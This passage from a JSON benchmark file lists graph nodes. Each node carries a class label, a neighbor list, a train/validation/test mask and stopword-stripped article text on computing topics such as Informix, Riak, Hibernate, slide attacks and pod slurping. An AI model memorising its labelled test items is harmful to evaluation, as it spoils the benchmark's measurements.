offers netezza data warehouse appliance cloudant nosql database ibm described approach market providing workload optimized systems informix generally considered optimized environments low database administration including use embedded database long track record supporting high transaction rates providing uptime characteristics needed mission critical applications manufacturing lines reservation systems informix widely deployed retail sector low administration overhead makes useful in-store deployments ability deeply embed informix gateways routers timeseries support small footprint low administration requirements informix also targeted internet-of-things solutions many data-handling requirements handled gateways embed informix connect sensors devices internet april 2017 ibm announced outsourcing development informix indian specialists hcl number ibm employees working informix would also move hcl part arrangement ibm continue market sell informix customers addition products based version 12.1 engine ibm informix family also includes number legacy database products still supported market include informix online informix standard edition se informix c-isam products simpler smaller footprint database engines also frequently embedded third party applications collectively products often referred informix classics ibm informix family also includes client-side development environment client-sdk supports number different environments including .net windows developers variety protocols unix linux environments ibm long-term plans informix db2 databases sharing technology although ibm continually denied fusion two products ibm training includes complete set core data servers training courses apply informix courses delve many essential informix concepts fundamentals advanced sql topics part ibm academic initiative ibm offering informix software documentation training higher education institutions worldwide new informix campus program ibm offering inclusive package informix materials college faculty called informix box offers hands-on labs powerpoints use lessons recorded training teachers dvds class material vmware virtual appliance images well t-shirts students users groups remain active belgium croatia france germany united states many countries iiug international informix users group acts federation user groups provides numerous services members",
    "neighbors": [
      8201,
      1546,
      1037,
      2068,
      4116,
      4630,
      1049,
      5658,
      2089,
      10286,
      9268,
      9782,
      5691,
      9286,
      4680,
      8781,
      10326,
      8792,
      9828,
      10340,
      2669,
      6770,
      1142,
      6775,
      2168,
      1146,
      6780,
      3196,
      5768,
      8340,
      10389,
      4255,
      4263,
      6311,
      8871,
      4781,
      10413,
      9397,
      6850,
      3784,
      11473,
      2775,
      8411,
      2780,
      734,
      10471,
      6378,
      6383,
      9455,
      7412,
      3323,
      11515,
      5374,
      11024,
      8979,
      5910,
      7446,
      1816,
      10518,
      5403,
      284,
      11551,
      2344,
      10040,
      2364,
      10048,
      5953,
      5450,
      11085,
      2901,
      3414,
      1383,
      2413,
      7022,
      9075,
      8052,
      3960,
      10632,
      5006,
      2456,
      10137,
      9631,
      9634,
      7588,
      7080,
      5546,
      5549,
      9138,
      5051,
      3004,
      9177,
      4058,
      987,
      4065,
      3045,
      6124,
      2544,
      10737,
      2043
    ],
    "mask": "Test"
  },
  {
    "node_id": 6851,
    "label": 7,
    "text": "Basho_Technologies:basho technologies basho technologies distributed systems company developed key-value nosql database technology riak object storage system built upon riak platform called riak cs basho developer riak open source distributed database offers high availability fault tolerance operation simplicity scalability riak enterprise commercial version database offered basho project sponsor advanced multi-data center replication enterprise support riak key value store system collect unstructured data store objects buckets queried also highly scalable able distribute server cluster add new servers needed maintaining high availability riak written erlang language gives system built-in support distribution across server cluster fault tolerance ability absorb new hardware added cluster without disrupting operations following demise basho company assets purchased bet365 previously closed source components riak_repl multi-data-centre replication released open-source github.com basho also offered riak cloud storage cs open source multi-tenant cloud storage database built riak platform integrated private clouds public clouds amazon web services aws used enterprises power internal private clouds startups amazon-compatible api download service riak cs includes large object support s3-compatible api authentication multi-tenancy per-user reporting operational model adding capacity visual interface monitoring metrics riak 1.0 released september 2011 featured secondary indexes riak pipe riak search integration lager leveldb support riak 1.1 released early 2012 included numerous changes riak core new ownership claim algorithm riak kv improvements mapreduce improvements august 2012 riak 1.2 released riak enterprise 1.2 added ssl encryption better balancing granular control replication across multiple data centers march 2013 basho released portions riak cs code open source basho also announced commercial version riak cs enterprise adding multi-datacenter replication monitoring tools 24x7 support riak 1.4 featured pn-counters database first distributed data type pn-counters eventually consistent incremented decremented node across cluster compact binary data format reduces storage overheads connected small objects large bucket names riak cs 1.4 provides compatibility openstack openstack object storage swift ceph object stores increased scalability riak 2.0 released september 2014 includes support new data types tunable consistency search integration apache solr riak 2.1 released april 2015 focused performance simplification developers system administrators basho technologies founded january 2008 earl galleher former executive vice president akamai technologies antony falco former vp product management technical services akamai 2011 donald j. rippert long time cto accenture joined basho president ceo bobby patrick former cmo gxs digex joined cmo late 2012 rippert left basho gregory collins took ceo basho march 2014 collins stepped adam wray former ceo tier 3 became new ceo basho time basho cto justin sheehy chief architect original riak author andy gross left company dave mccrory former svp engineering warner music group took cto mccrory well known creating concept data gravity theory describes difficulty relocating large volumes data due physical restrictions bandwidth 2012 basho announced ricon two-day distributed systems conference developers basho hosted ricon west ricon east 2012 2013 hosted single ricon conference 2014 2015 basho recognized dbta 100 companies matter data crn big data 100 data management 2017 basho put receivership",
    "neighbors": [
      9601,
      8170,
      11595,
      11343,
      7248,
      19,
      11221,
      5560,
      8446,
      3582,
      8408
    ],
    "mask": "None"
  },
  {
    "node_id": 6852,
    "label": 4,
    "text": "EMC_NetWorker:emc networker emc networker formerly legato networker enterprise-level data protection software product unifies automates backup tape disk-based flash-based storage media across physical virtual environments granular disaster recovery cross-platform support provided linux windows macos netware openvms unix environments deduplication backup data provided integration dell emc data domain dd boost storage solutions central networker server manages datazone contains backup clients networker storage nodes access backup media platforms supported core networker server aix hp-ux pa-risc itanium linux fully featured x86 x86-64 itanium client powerpc zlinux macos client solaris sparc x64 sgi irix client tru64 windows java based networker management console nmc software bundled networker distribution provides user interface functions client configuration policy settings schedules monitoring reports daily operations deduplicated non-deduplicated backups core networker software backs client file systems operating system environment add-on database application modules provide backup services products oracle db2 sap lotus informix sybase well microsoft exchange server sharepoint sql server client backup data sent remote networker storage node stored locally attached device use dedicated storage node additionally networker supports client direct backups allowing clients back directly shared devices bypassing storage node processes networker snapshot management automates generation point-in-time data snapshots cloning supported storage arrays emc vnx xtremio symmetrix ndmp module used client-less backups nas filers like isilon emc vnx netapp vmware virtual machines directly backed either installing networker client virtual machine networker vmware protection solution leverages vproxys perform application consistent image filesystem backups networker also supports backup recovery microsoft windows server hyper-v virtual servers using volume shadow copy services interface support protects parent child partitions guests well applications running within virtual machines networker came emc acquisition legato october 2003 legato founded 1988 four individuals worked together sun microsystems jon kepecs bob lyon joe moran russell sandberg networker unix first introduced 1990",
    "neighbors": [
      9218,
      6153,
      6797,
      5523,
      1304,
      9655,
      823,
      10302,
      10051,
      11332,
      10951,
      1358,
      863,
      11233,
      2154,
      5356,
      8944,
      499,
      5492,
      1399,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 6853,
    "label": 7,
    "text": "BuildHive:buildhive buildhive free cloud-hosted continuous integration service github projects based jenkins buildhive detect build test number common project types apache maven play without need configuration developer starts build test cycle every time sees new commit registered github repository also automatically schedule builds github pull requests leave pass/fail comment pull request project owners know whether pull requests pass tests merging contributors wait tests run machine submitting pull request number features provided commercial jenkins plugins cloudbees also makes available paying customers buildhive support private github repositories complex configurations commercial cloudbees service available requirements buildhive originally started christmas side project developer kohsuke kawaguchi",
    "neighbors": [
      9297,
      4194,
      11221
    ],
    "mask": "None"
  },
  {
    "node_id": 6854,
    "label": 3,
    "text": "MIPS_Magnum:mips magnum mips magnum line computer workstations designed mips computer systems inc. based mips series risc microprocessors first magnum released march 1990 production various models continued 1993 sgi bought mips technologies sgi cancelled mips magnum line promote workstations including entry-level sgi indy early r3000-based magnum series ran risc/os variant bsd unix subsequent magnum workstations based jazz architecture ran risc/os windows nt addition proprietary operating systems linux netbsd ported jazz-based mips magnum machines models mips magnum rebadged sold groupe bull olivetti addition headless i.e. without framebuffer video card versions marketed servers name mips millennium model number information mips magnum 3000 25 33 mhz mips r3000a microprocessor mips magnum r4000 pc-50 mips r4000pc processor 16 kb l1 cache l2 cache running external clock rate 50 mhz internally doubled microprocessor 100 mhz mips magnum r4000 sc-50 identical magnum r4000pc includes one megabyte secondary cache addition primary cache main memory mips magnum 3000 accepted 30-pin true-parity 80ns simms maximum 128 mb mips magnum r4000 accepted eight 72-pin true-parity simms maximum 256 mb mips magnum r4000 r4000 pc-50 r4000 sc-50 includes single on-board scsi bus using on-board ncr 53c94 fast-narrow scsi chipset internal cable four 50-pin connections links internal scsi devices also interfaces external scsi devices via endlink mounted rear case mips magnum r4000 includes on-board sonic ethernet chipset aui ethernet connector mounted case video output magnum r4000 consists proprietary framebuffer available custom full-length option card — g364 framebuffer g364 includes sun 13w3-style output converted common vga pin-out capable pixel screen resolutions 640x480 800x600 1024x768 1280x1024 simple framebuffer g364 include accelerated graphics functions mips magnum r4000 also includes two standard rs232-capable serial ports ibm at-compatible parallel port also mips magnum r4000 ibm at-compatible floppy disk controller single floppy drive bay mips magnum 3000 used mips r3000 processor custom proprietary motherboard incorporated turbochannel bus noted dec also manufactured decstation line workstations running ultrix also used mips processors turbochannel bus magnum 3000 ran risc/os mips computer systems inc. proprietary port bsd unix including system v features later magnums mips magnum r4000pc mips magnum r4000sc also used mips microprocessor — mips r4000 full 64-bit microprocessor available either low-cost version r4000pc 16 kb l1 cache l2 cache higher-performance version r4000sc 1 mb secondary cache addition 16 kb primary cache mips computer systems inc. co-founded advanced computing environment consortium silicon graphics microsoft motorola others mips magnum r4000 intended mips entry windows nt workstation market however mips computer systems inc. in-house effort design mips-based windows nt system met delays mips technologies abandoned in-house efforts instead licensed jazz design microsoft developed early 1990s facilitate porting development windows nt noted windows nt first developed mips architecture later ported intel 386 alpha powerpc architectures mips magnum r4000 indeed jazz-based systems acer pica nec riscstation olivetti m700 etc incorporated many features common intel-based pc commercial unix workstations era — example magnum r4000 included eisa bus used ibm ps/2-compatible keyboards mice used commodity chipset components whose control registers mapped memory locations set forth ibm standard mips magnum r4000 ran either windows nt beginning version 3.1 equipped little-endian arc firmware risc/os mips computer systems inc. proprietary big-endian firmware mips monitor installed firmware could switched arc mips monitor loading either one magnum flash memory/nvram floppy disk thus magnum r4000 could dual-boot windows unix mips magnum r4000 supported windows nt version 3.1 released 1993 version 4.0 released 1996 however support microsoft mips systems ended release windows nt version 4.0 useful software windows/mips — either microsoft third-party vendors — scarce even mips supported example microsoft never ported microsoft office suite mips mips magnum 3000 unlike mips magnum r4000 able run windows nt magnums could run risc/os mips computer system inc. proprietary port unix running risc/os mips magnum r4000 requires use big-endian mips monitor firmware mips magnum run netbsd also ran openbsd one point lack developer interest proper resources lead termination arch support prior december 1 1998 2.4 release earlier risc/os-only mips magnum 3000 machines correct port netbsd/mipsco later windows nt-capable mips magnum r4000 correct port netbsd/arc mips magnum r4000 among earliest supported machines effort port linux kernel mips initial support begun april 1995 support magnum r4000 became stable 2.1 development tree around 1999 however support magnum linux atrophied since qemu pc emulator version 0.9.1 emulate mips magnum acer pica 61 using -m parameter -m magnum -m pica61 qemu run mips compiled version debian gnu/linux x86 platform along windows nt 3.5,3.51 4.0 binaries",
    "neighbors": [
      780,
      8976,
      2452,
      2071,
      408,
      6942,
      7594,
      7215,
      11058,
      2995,
      5686,
      823,
      9665,
      7234,
      10051,
      3142,
      9932,
      2525,
      6879,
      3818,
      6250,
      6252,
      10734,
      7151,
      5873,
      5492,
      3445,
      8700,
      11007
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6855,
    "label": 2,
    "text": "Messages_Server:messages server messages server component os x server apple inc first introduced ichat server release mac os x server 10.4 upgraded version 2 release mac os x 10.5 server october 2007. ichat server originally based jabberd 1.4.3 named apple ichat online chat client software version 2 software based jabberd2 2.0s9 supports server federation allows chat clients talk directly systems support xmpp also supports server-based chat archiving",
    "neighbors": [
      10242,
      5251,
      5382,
      4746,
      1036,
      11408,
      7318,
      3228,
      10271,
      3105,
      9511,
      168,
      1962,
      7983,
      9519,
      8758,
      1467,
      6208,
      1218,
      2760,
      2892,
      7378,
      8404,
      4318,
      865,
      3812,
      4068,
      5093,
      6628,
      7928,
      8441,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 6856,
    "label": 7,
    "text": "Utility_computing:utility computing utility computing computer utility service provisioning model service provider makes computing resources infrastructure management available customer needed charges specific usage rather flat rate like types on-demand computing grid computing utility model seeks maximize efficient use resources and/or minimize associated costs utility packaging system resources computation storage services metered service model advantage low initial cost acquire computer resources instead resources essentially rented repackaging computing services became foundation shift demand computing software service cloud computing models propagated idea computing application network service initial skepticism significant shift however new model computing caught eventually became mainstream ibm hp microsoft early leaders new field utility computing business units researchers working architecture payment development challenges new computing model google amazon others started take lead 2008 established utility services computing storage applications utility computing support grid computing characteristic large computations sudden peaks demand supported via large number computers utility computing usually envisioned form virtualization amount storage computing power available considerably larger single time-sharing computer multiple servers used back end make possible might dedicated computer cluster specifically built purpose rented even under-utilized supercomputer technique running single calculation multiple computers known distributed computing term grid computing often used describe particular form distributed computing supporting nodes geographically distributed cross administrative domains provide utility computing services company bundle resources members public sale might paid portion revenue clients one model common among volunteer computing applications central server dispense tasks participating nodes behest approved end-users commercial case paying customers another model sometimes called virtual organization vo decentralized organizations buying selling computing resources needed go idle definition utility computing sometimes extended specialized tasks web services utility computing merely means pay use regards computing power utility computing new concept rather quite long history among earliest references ibm mainframe providers conducted kind business following two decades often referred time-sharing offering computing power database storage banks large organizations worldwide data centers facilitate business model mainframe operating systems evolved include process control facilities security user metering advent mini computers changed business model making computers affordable almost companies intel amd increased power pc architecture servers new generation processor data centers became filled thousands servers late 90 utility computing re-surfaced insynq inc. launched on-demand applications desktop hosting services 1997 using hp equipment 1998 hp set utility computing division mountain view ca assigning former bell labs computer scientists begin work computing power plant incorporating multiple utilities form software stack services ip billing-on-tap marketed hp introduced utility data center 2001 sun announced sun cloud service consumers 2000 december 2005 alexa launched alexa web search platform web search building tool underlying power utility computing alexa charges users storage utilization etc space market specific industries applications well niche applications powered utility computing example polyserve inc. offers clustered file system based commodity server storage hardware creates highly available utility computing environments mission-critical applications including oracle microsoft sql server databases well workload optimized solutions specifically tuned bulk storage high-performance computing vertical industries financial services seismic processing content serving database utility file serving utility enable organizations independently add servers storage needed retask workloads different hardware maintain environment without disruption spring 2006 3tera announced applogic service later summer amazon launched amazon ec2 elastic compute cloud services allow operation general purpose computing applications based xen virtualization software commonly used operating system virtual computers linux though windows solaris supported common uses include web application saas image rendering processing also general-purpose business applications decision support business intelligence 8th edition page 680",
    "neighbors": [
      2314,
      526,
      3086,
      531,
      6421,
      2710,
      154,
      10020,
      170,
      4799,
      9665,
      4802,
      11075,
      5956,
      1480,
      3405,
      467,
      8792,
      10200,
      7642,
      735,
      4194,
      7537,
      6772
    ],
    "mask": "Test"
  },
  {
    "node_id": 6857,
    "label": 5,
    "text": "Shared_medium:shared medium telecommunication shared medium medium channel information transfer serves one user time channels function correctly one user transmitting channel access method always effect circuit switching user typically gets fixed share channel capacity multiplexing scheme divides capacity medium common multiplexing schemes include time-division multiplexing frequency-division multiplexing channel access methods circuit switching include time-division multiple access frequency-division multiple access etc packet switching sharing dynamic — user takes little none capacity idle utilize entire capacity transmitting users idle channel access methods packet switching include carrier sense multiple access token passing etc",
    "neighbors": [
      3168,
      2785,
      7490,
      2787,
      5092,
      7498,
      5581,
      11181,
      2994,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 6858,
    "label": 3,
    "text": "Silicon_Graphics_International:silicon graphics international silicon graphics international corp. sgi formerly rackable systems inc. american manufacturer computer hardware software including high-performance computing solutions x86-based servers datacenter deployment visualization products founded rackable systems 1999 adopted sgi name 2009 acquiring silicon graphics inc.. november 1 2016 hewlett packard enterprise completed acquisition sgi 275 million rackable systems inc. went public june 2005 6.25 million shares offered 12 per share 2006 rackable announced signed agreement acquire terrascale technologies inc. april 1 2009 rackable announced agreement acquire silicon graphics inc. 25 million purchase ultimately 42.5 million finalized may 11 2009 time rackable announced adoption sgi global name brand following week company changed nasdaq stock ticker symbol rack sgi new sgi began two main product lines servers storage continuing original rackable systems servers storage visualization professional services acquired silicon graphics inc. time acquisition completion sgi said anticipated survival majority two companies product lines although consolidation likely areas high overlap products 2010 sgi announced purchase assets assumed limited amount liabilities copan systems copan provider storage archive products real-time access long-term persistent data copan products offered part sgi storage line 2011 sgi acquired outstanding shares sgi japan ltd year company announced acquisition opencfd ltd december company announced mark j. barrenechea resignation president chief executive officer member board directors mark reported join open text corporation shortly thereafter announced barrenechea agreed continue serve sgi board february 2012 announced jorge luis titinger would become sgi president chief executive officer 2013 sgi acquired filetek inc. august 11 2016 announced hewlett packard enterprise would acquire sgi 7.75 per share cash transaction valued approximately 275 million net cash debt deal completed november 1 2016",
    "neighbors": [
      3328,
      5380,
      9095,
      5898,
      7311,
      5523,
      5272,
      9762,
      426,
      3764,
      11447,
      7234,
      10051,
      1480,
      9932,
      5076,
      7001,
      221,
      4194,
      6243,
      8164,
      998,
      1638,
      5356,
      4463,
      499,
      1398,
      1149
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6859,
    "label": 3,
    "text": "ET-188:et-188 et-188 ibm pc xt compatible computer made yugoslav company novkabel novosadska fabrika kabela novi sad cable factory novi sad serbia 1980s novkabel already experience developing computer systems era 20 era 60 others used make et-188 original design compatible ibm pc xt save space lower cost et-188 used 8mhz intel 80188 cpu integrated timer dma interrupt controller also made faster original xt et-188 offered public 1985 advertised yugoslav computer press improved et-188a model may 1986 presented public belgrade technical fair beogradski sajam tehnike ram new redesigned case among things et-188a used education classrooms throughout vojvodina province",
    "neighbors": [
      9606,
      1515,
      780,
      10635,
      9166,
      7665,
      10356
    ],
    "mask": "Train"
  },
  {
    "node_id": 6860,
    "label": 1,
    "text": "Hibernate_(framework):hibernate framework hibernate orm hibernate short object-relational mapping tool java programming language provides framework mapping object-oriented domain model relational database hibernate handles object-relational impedance mismatch problems replacing direct persistent database accesses high-level object handling functions hibernate free software distributed gnu lesser general public license 2.1 hibernate primary feature mapping java classes database tables mapping java data types sql data types hibernate also provides data query retrieval facilities generates sql calls relieves developer manual handling object conversion result set mapping java classes database tables implemented configuration xml file using java annotations using xml file hibernate generate skeleton source code persistence classes auxiliary annotations used hibernate use xml file java annotations maintain database schema provided facilities arrange one-to-many many-to-many relationships classes addition managing associations objects hibernate also manage reflexive associations wherein object one-to-many relationship instances class type hibernate supports mapping custom value types makes following scenarios possible definition objects object-oriented application follow oop principles objects back-end follow database normalization principles resulting different representation requirements problem called object-relational impedance mismatch mapping way resolving object-relational impedance mismatch problem mapping informs orm tool java class object store database table hibernate provides sql inspired language called hibernate query language hql writing sql-like queries hibernate data objects criteria queries provided object-oriented alternative hql criteria query used modify objects provide restriction objects hql hibernate query language object-oriented version sql generates database independent queries need write database-specific queries without capability changing database would require individual sql queries changed well leading maintenance issues hibernate provides transparent persistence plain old java objects pojos strict requirement persistent class no-argument constructor though necessarily proper behavior applications also requires special attention methods object classes hibernate recommends providing identifier attribute planned mandatory requirement future release collections data objects typically stored java collection classes implementations interfaces java generics introduced java 5 also supported hibernate configured lazy load associated collections lazy loading default hibernate 3 related objects configured cascade operations one object example parent class object configured cascade operations child class objects hibernate used standalone java applications java ee applications using servlets ejb session beans jbi service components also included feature programming languages example adobe integrated hibernate version 9 coldfusion runs j2ee app servers abstraction layer new functions syntax added cfml hibernate jargon entity stand-alone object hibernate persistent mechanism manipulated independently objects contrast component subordinate entity manipulated respect entity example album object may represent entity tracks object associated album objects would represent component album entity assumed tracks saved retrieved database album object unlike j2ee hibernate switch databases hibernate started 2001 gavin king colleagues cirrus technologies alternative using ejb2-style entity beans original goal offer better persistence capabilities offered ejb2 simplifying complexities supplementing certain missing features early 2003 hibernate development team began hibernate2 releases offered many significant improvements first release jboss inc. part red hat later hired lead hibernate developers order development 2005 hibernate version 3.0 released key features included new interceptor/callback architecture user defined filters jdk 5.0 annotations java metadata feature hibernate 3 version 3.5.0 certified implementation java persistence api 2.0 specification via wrapper core module provides conformity jsr 317 standard dec 2011 hibernate core 4.0.0 final released includes new features multi-tenancy support introduction serviceregistry major change hibernate builds manages services better session opening sessionfactory improved integration via org.hibernate.integrator.spi.integrator auto discovery internationalization support message codes logging distinction api spi implementation classes december 2012 hibernate orm 4.1.9 final released mar 2013 hibernate orm 4.2 final released december 2013 hibernate orm 4.3.0 final released features java persistence api 2.1 september 2015 hibernate orm 5.0.2 final released improved bootstrapping hibernate-java8 hibernate-spatial karaf support november 2018 hibernate orm 5.1.17 final released final release 5.1 series october 2018 hibernate orm 5.3 final released featured java persistence api 2.2 inheritance caching december 2018 hibernate orm 5.4.0 final released hibernate api provided java package org.hibernate org.hibernate.session interface represents hibernate session i.e. main point manipulation performed database entities latter activities include among things managing persistence state transient persisted detached objects fetching persisted ones database management transaction demarcation session intended last long logical transaction database due latter feature session implementations expected thread safe used multiple clients hibernate software includes following components",
    "neighbors": [
      3591,
      3080,
      7176,
      1034,
      10250,
      2063,
      5677,
      3131,
      572,
      7742,
      11327,
      7750,
      9286,
      2658,
      1142,
      8825,
      3705,
      3710,
      3712,
      148,
      9896,
      10413,
      3763,
      5314,
      6860,
      1756,
      1250,
      9455,
      5872,
      1780,
      9467,
      4358,
      10526,
      10540,
      7983,
      7475,
      9011,
      3895,
      7485,
      10573,
      3920,
      4944,
      1363,
      5460,
      862,
      4960,
      5987,
      4452,
      7022,
      9078,
      3966,
      910,
      10145,
      5031,
      6067,
      5047,
      9144,
      5048,
      6074,
      10683,
      3004,
      3517,
      10684,
      3519,
      3008,
      5567,
      9665,
      10193,
      479,
      993,
      3560,
      3561,
      3562,
      7146,
      5612,
      10737,
      3573,
      2556,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 6861,
    "label": 5,
    "text": "JREAP:jreap joint range extension applications protocol jreap enables tactical data messages transmitted long-distance networks e.g satellite links thereby extending range tactical data links tdls jreap documented u.s. military standard mil-std 3011 nato standardization agreement stanag 5518 interoperability standard joint range extension applications protocol jreap jreap developed due need communicate data long distances without degradation message format content jreap takes message format originally formatted changes protocol message transmitted beyond line-of sight media jreap protocol message structure transmission reception pre-formatted messages communications media messages designed jreap provides foundation joint range extension jre link 16 tactical data links overcome line-of-sight limitations radio terminals joint tactical information distribution system jtids multifunctional information distribution system mids extends coverage data links use long-haul media",
    "neighbors": [
      5472,
      10924,
      11413,
      7388,
      9725,
      4223
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6862,
    "label": 7,
    "text": "List_of_BPMN_2.0_engines:list bpmn 2.0 engines list notable business process model notation 2.0 bpmn 2.0 workflow management systems wfmss",
    "neighbors": [
      8425,
      5677,
      1041,
      4088,
      10236,
      7261
    ],
    "mask": "None"
  },
  {
    "node_id": 6863,
    "label": 4,
    "text": "Slide_attack:slide attack slide attack form cryptanalysis designed deal prevailing idea even weak ciphers become strong increasing number rounds ward differential attack slide attack works way make number rounds cipher irrelevant rather looking data-randomizing aspects block cipher slide attack works analyzing key schedule exploiting weaknesses break cipher common one keys repeating cyclic manner attack first described david wagner alex biryukov bruce schneier first suggested term slide attack used 1999 paper describing attack requirements slide attack work cipher broken multiple rounds identical f function probably means cyclic key schedule f function must vulnerable known-plaintext attack slide attack closely related related-key attack idea slide attack roots paper published edna grossman bryant tuckerman ibm technical report 1977 grossman tuckerman demonstrated attack weak block cipher named new data seal nds attack relied fact cipher identical subkeys round cipher cyclic key schedule cycle one key makes early version slide attack summary report including description nds block cipher attack given cipher systems beker piper 1982 first introduce notation section assume cipher takes n bit blocks key-schedule using formula_1 keys length slide attack works breaking cipher identical permutation functions f f function may consist one round cipher defined key-schedule example cipher uses alternating key schedule switches formula_2 formula_3 round f function would consist two rounds formula_4 appear least f next step collect formula_5 plaintext-ciphertext pairs depending characteristics cipher fewer may suffice birthday paradox formula_5 needed pairs denoted formula_7 used find slid pair denoted formula_8 slid pair property formula_9 formula_10 slid pair identified cipher broken vulnerability known-plaintext attacks key easily extracted pairing slid pair thought happens message one application function f ’ slid ’ one encryption round attack gets name process finding slid pair somewhat different cipher follows basic scheme one uses fact relatively easy extract key one iteration f choose pair plaintext-ciphertext pairs formula_8 check see keys corresponding formula_9 formula_10 keys match slid pair otherwise move next pair formula_5 plaintext-ciphertext pairs one slid pair expected along small number false-positives depending structure cipher false positives eliminated using keys different message-ciphertext pair see encryption correct probability wrong key correctly encipher two messages low good cipher sometimes structure cipher greatly reduces number plaintext-ciphertext pairs needed thus also large amount work clearest examples feistel cipher using cyclic key schedule reason given formula_15 search formula_16 reduces possible paired messages formula_17 formula_5 since half message fixed formula_19 plaintext-ciphertext pairs needed order find slid pair",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9156,
      9541,
      10315,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      1114,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 6864,
    "label": 2,
    "text": "Highly_Available_STorage:highly available storage highly available storage hast protocol tool set freebsd written pawel jakub dawidek core freebsd developer hast provides block device synchronized two servers use filesystem two machines comprise cluster machine cluster node hast uses primary-secondary master-slave configuration one cluster node active time hast-provided devices appear like disk devices /dev/hast/ directory freebsd used like standard block devices hast similar raid1 mirror raid component provided across network one cluster node",
    "neighbors": [
      1927,
      274,
      9625,
      1946,
      4636,
      2212,
      10535,
      7983,
      11698,
      11573,
      1718,
      10422,
      5177,
      5819,
      11459,
      8266,
      8395,
      7249,
      850,
      10455,
      6361,
      9306,
      6491,
      7521,
      1891,
      998,
      4073,
      9201,
      3058,
      7027,
      9844,
      2421,
      2424,
      1273,
      2045,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 6865,
    "label": 3,
    "text": "Slipstream_(computer_science):slipstream computer science slipstream processor architecture designed reduce length running program removing non-essential instructions form speculative computing non-essential instructions include things results written memory compare operations always return true also statistically branch instructions taken makes sense assume always case speculation involved slipstream processors generally described two parallel executing streams one optimized faster a-stream executing reduced code slower r-stream runs behind a-stream executes full code r-stream runs faster single stream due data prefetched a-stream effectively hiding memory latency due a-stream assistance branch prediction two streams complete faster single stream would 2005 theoretical studies shown configuration lead speedup around 20 main problem approach accuracy a-stream becomes accurate less speculative overall system runs slower furthermore large enough distance needed a-stream r-stream cache misses generated a-stream slow r-stream",
    "neighbors": [
      8815
    ],
    "mask": "Test"
  },
  {
    "node_id": 6866,
    "label": 4,
    "text": "Pod_slurping:pod slurping pod slurping act using portable data storage device ipod digital audio player illicitly download large quantities confidential data directly plugging computer data held may inside firewall work development fixes problem including number third-party security products allow companies set security policies related usb device use features within operating systems allow administrators users disable usb port altogether unix-based unix-like systems easily prevent users mounting storage devices microsoft released instructions preventing users installing usb mass storage devices operating systems additional measures include physical obstruction usb ports measures ranging simple filling ports epoxy resin commercial solutions deposit lockable plug port following external links act indirect mechanism learning topic e.g. detailed descriptions examples implementations",
    "neighbors": [
      8998,
      2953,
      4620,
      7983,
      11568,
      5492,
      5397
    ],
    "mask": "Test"
  },
  {
    "node_id": 6867,
    "label": 3,
    "text": "Sokoban_(video_game):sokoban video game version game includes 50 levels 1988 sokoban published us spectrum holobyte commodore 64 ibm-pc apple ii series soko-ban sokoban hit japan sold 400,000 units country time spectrum holobyte imported united states 1988 review computer gaming world praised spectrum holobyte soko-ban pure simple playable mentally challenging citing addictive qualities also reviewed 1988 dragon 132 hartley patricia kirk lesser role computers column reviewers gave game 4½ 5 stars",
    "neighbors": [
      9006,
      5762,
      9166,
      7622
    ],
    "mask": "Test"
  },
  {
    "node_id": 6868,
    "label": 2,
    "text": "X86_memory_segmentation:x86 memory segmentation x86 memory segmentation refers implementation memory segmentation intel x86 computer instruction set architecture segmentation introduced intel 8086 1978 way allow programs address 64 kb 65,536 bytes memory intel 80286 introduced second version segmentation 1982 added support virtual memory memory protection point original model renamed real mode new version named protected mode x86-64 architecture introduced 2003 largely dropped support segmentation 64-bit mode real protected modes system uses 16-bit segment registers derive actual memory address real mode registers cs ds ss es point currently used program code segment cs current data segment ds current stack segment ss one extra segment determined programmer es intel 80386 introduced 1985 adds two additional segment registers fs gs specific uses defined hardware way segment registers used differs two modes choice segment normally defaulted processor according function executed instructions always fetched code segment stack push pop data reference referring stack uses stack segment references data use data segment extra segment default destination string operations example movs cmps fs gs hardware-assigned uses instruction format allows optional segment prefix byte used override default segment selected instructions desired real mode v86 mode size segment range 1 byte 65,536 bytes using 16-bit offsets 16-bit segment selector segment register interpreted significant 16 bits linear 20-bit address called segment address remaining four least significant bits zeros segment address always added 16-bit offset instruction yield linear address physical address mode instance segmented address 06efh:1234h suffix h means hexadecimal segment selector 06efh representing segment address 06ef0h offset added yielding linear address 06ef0h 1234h 08124h way segment address offset added single linear address mapped 2 4096 distinct segment offset pairs example linear address 08124h segmented addresses 06efh:1234h 0812h:0004h 0000h:8124h etc could confusing programmers accustomed unique addressing schemes also used advantage example addressing multiple nested data structures real mode segments always 64 kb long practical effect segment longer 64 kb rather every segment must 64 kb long protection privilege limitation real mode even segment could defined smaller 64 kb would still entirely programs coordinate keep within bounds segments program always access memory since arbitrarily set segment selectors change segment addresses absolutely supervision therefore real mode well imagined variable length segment range 1 65,536 bytes enforced cpu effective 20-bit address space real mode limits addressable memory 2 bytes 1,048,576 bytes 1 mb derived directly hardware design intel 8086 subsequently closely related 8088 exactly 20 address pins packaged 40-pin dip packages even 20 address lines address data buses multiplexed fit address data lines within limited pin count segment begins multiple 16 bytes called paragraph beginning linear flat address space 16 byte intervals since segments 64 kb long explains overlap occur segments location linear memory address space accessed many segment offset pairs actual location beginning segment linear address space calculated segment×16 segment value 0ch 12 would give linear address c0h 192 linear address space address offset added number 0ch:0fh 12:15 would c0h+0fh=cfh 192+15=207 cfh 207 linear address address translations carried segmentation unit cpu last segment ffffh 65535 begins linear address ffff0h 1048560 16 bytes end 20 bit address space thus access offset 65,536 bytes 65,520 65536−16 bytes past end 20 bit 8088 address space 8088 address accesses wrapped around beginning address space 65535:16 would access address 0 65533:1000 would access address 952 linear address space programmers using feature led gate a20 compatibility issues later cpu generations linear address space expanded past 20 bits 16-bit real mode enabling applications make use multiple memory segments order access memory available one 64k-segment quite complex viewed necessary evil smallest tools could less memory root problem 